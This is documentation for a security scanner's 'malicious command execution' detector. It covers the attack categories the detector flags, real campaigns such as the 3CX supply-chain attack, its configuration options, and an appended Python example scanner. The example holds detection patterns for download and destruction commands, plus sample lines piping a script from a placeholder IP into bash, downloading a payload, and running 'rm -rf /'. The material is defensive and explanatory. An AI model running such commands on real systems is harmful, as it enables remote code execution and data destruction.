Malicious Command Execution

ID

malicious_command_execution

Severity

high

Resource

Execution

Tags

generic

Description

This detector looks for potentially malicious commands being executed.

Rationale

On some occasions, malicious code includes hardcoded literal commands that may be dangerous for the system. These are the kinds of command to pay attention to:

  • Data enumeration and Data exfiltration: This relates to malicious software specifically designed to surreptitiously collect sensitive or confidential data from a compromised system and transmit it to an external location controlled by attackers. This type of malware poses a serious threat to the confidentiality and integrity of data within an organization.

  • Execution Policy Bypass: The execution policy isn’t a security system that restricts user actions. For example, users can easily bypass a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users set basic rules and prevents them from violating those rules unintentionally. Thus, malware can easily take advantage of this to execute its malicious code.

  • External request: This is more generic but still relevant. Sometimes malicious code performs a generic external request from the affected system to the malicious host, just to report that the infected system is still alive, a kind of ping.

  • File download: Usually a malware infection involves more than one phase or set of malicious files. A common situation is downloading further malicious scripts or binaries from the malicious host to ensure persistence on the system or to extend the malware’s capabilities.

  • Reverse shell: This refers to a scenario where malware establishes a reverse shell to provide unauthorized access and control over an infected system to an external attacker. Once they obtain this, the system is totally under their control.

  • Reverse shell listener: This refers to a scenario where the infected system establishes a connection to a malware host, probably one that is serving a file meant to be executed on the affected system to ensure persistence or to extend the malware’s capabilities.

  • Scheduled task: This typically involves malicious software creating scheduled tasks on an infected system to execute certain actions at specified times or intervals. This may ensure persistence and availability every time the system boots.

These are some popular campaigns using this technique:

  • 3CX Supply Chain Attack unfolded in March 2023 as a significant supply chain security breach. The assailants successfully infiltrated applications by incorporating a compromised library file, leading to the subsequent download of an encrypted file housing Command & Control information.

    The affected software ran a downloader, SUDDENICON, which in turn received additional command and control (C2) servers from encrypted icon files hosted on GitHub. The decrypted C2 server was used to download a third stage identified as ICONICSTEALER, a dataminer that steals browser information.

  • DEADEYE functions as a malware launcher utilized by APT41, and its usage dates back to at least May 2021.

  • Earth Lusca is an alleged cyber espionage group believed to be based in China, exhibiting activity since at least April 2019.

  • Lokibot is an extensively disseminated information-stealing tool first identified in 2015. Its primary function involves extracting sensitive data such as usernames, passwords, cryptocurrency wallets, and various credentials. Furthermore, Lokibot can establish a backdoor in compromised systems, enabling attackers to introduce additional payloads.

  • Remsec serves as a modular backdoor employed by Strider, showcasing indications of being primarily designed for espionage purposes.

  • StrifeWater operates as a remote-access tool utilized by Moses Staff in the initial stages of their attacks, with a documented presence since at least November 2021.

Configuration

The detector has the following configurable parameters:

  • sources, which indicates the source kinds to check. Available values are:

    • clipboard_leakage

    • data_exfiltration

    • dependency_installation_on_runtime

    • destructive_action

    • downloaded_code_execution

    • file_download

    • file_execution

    • reverse_shell

    • reverse_shell_listener

    • sensitive_data

    • system_binary_proxy_execution

  • sinks, which indicates the sinks to check. Available values are:

    • command_injection

  • neutralizations, which indicates the neutralization kinds to check. By default this is empty: no neutralizers are considered for potentially malicious code.
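To show how the sources, sinks and neutralizations parameters described above shape what gets reported, here is an added example (not the detector's own code or rule set): a small scanner that flags hardcoded command literals reaching a process-spawning call, using a few constructed indicator patterns keyed by the source kinds listed in the configuration. The pattern table, the sink call names and the sample source lines are all assumptions made for this example.

```python
import re
from dataclasses import dataclass, field

# Illustrative indicator patterns per source kind (constructed for this example;
# not the detector's real rule set). Keys are source kinds from the configuration.
SOURCE_PATTERNS = {
    "file_download": re.compile(r"\b(curl|wget|Invoke-WebRequest)\b", re.I),
    "downloaded_code_execution": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b", re.I),
    "destructive_action": re.compile(r"\brm\s+-rf\s+/(\s|$)"),
}
# The only sink kind is command_injection: a literal reaching a process-spawning
# call. The call names below are assumed for this example.
SINK_CALLS = re.compile(r"\b(subprocess\.(run|Popen|call)|os\.system|os\.popen)\s*\(")
STRING_LITERAL = re.compile(r"""(["'])(.*?)\1""")

@dataclass
class DetectorConfig:
    sources: set = field(default_factory=lambda: set(SOURCE_PATTERNS))
    sinks: set = field(default_factory=lambda: {"command_injection"})
    neutralizations: set = field(default_factory=set)  # empty: nothing suppressed

def classify(command: str) -> list:
    """Return every source kind whose pattern matches the literal command."""
    return [kind for kind, rx in SOURCE_PATTERNS.items() if rx.search(command)]

def scan(lines, config: DetectorConfig) -> list:
    """Return (line_no, source_kind) for literals that reach a configured sink."""
    findings = []
    if "command_injection" not in config.sinks:
        return findings                  # no sink to check, so nothing to report
    for no, line in enumerate(lines, 1):
        if not SINK_CALLS.search(line):
            continue                     # the literal never reaches the sink
        for _, literal in STRING_LITERAL.findall(line):
            for kind in classify(literal):
                # neutralizations is empty by default, so no finding is dropped here
                if kind in config.sources and kind not in config.neutralizations:
                    findings.append((no, kind))
    return findings

# Constructed sample source lines (TEST-NET address, not a real host).
SAMPLE_LINES = [
    'subprocess.run("curl -s http://203.0.113.10/s.sh | bash", shell=True)',
    'os.system("wget http://203.0.113.10/p.bin -O /tmp/p")',
    'os.system("rm -rf / ")',
    'print("wget is used for downloads")',   # no sink call: not reported
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES, DetectorConfig()):
        print(finding)
```

Restricting sources to a single kind, or emptying sinks, narrows the report exactly as the configuration section describes.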